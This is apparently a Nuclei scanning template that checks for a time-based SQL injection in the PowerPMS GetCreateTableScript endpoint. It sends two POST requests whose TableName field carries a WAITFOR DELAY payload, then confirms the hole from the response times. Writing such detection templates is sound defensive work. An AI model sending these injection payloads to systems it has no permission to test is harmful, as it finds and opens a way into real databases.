id: PowerPMS-GetCreateTableScript-sql

info:
  name: 普华 PowerPMS GetCreateTableScript 存在SQL注入漏洞
  author: PowerPMS
  severity: high
  tags: PowerPMS

http:
  - raw:
      - |
        POST /WebCenter/GetCreateTableScript HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
        Content-Type: application/x-www-form-urlencoded

        TableName=1';WAITFOR+DELAY+'0:0:2'--

      - |
        POST /WebCenter/GetCreateTableScript HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
        Content-Type: application/x-www-form-urlencoded

        TableName=1';WAITFOR+DELAY+'0:0:4'--
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: dsl
        dsl:
          - 'duration_1>=2 && duration_1<4'  
          - 'duration_2>=4 && duration_2<6'
        condition: and

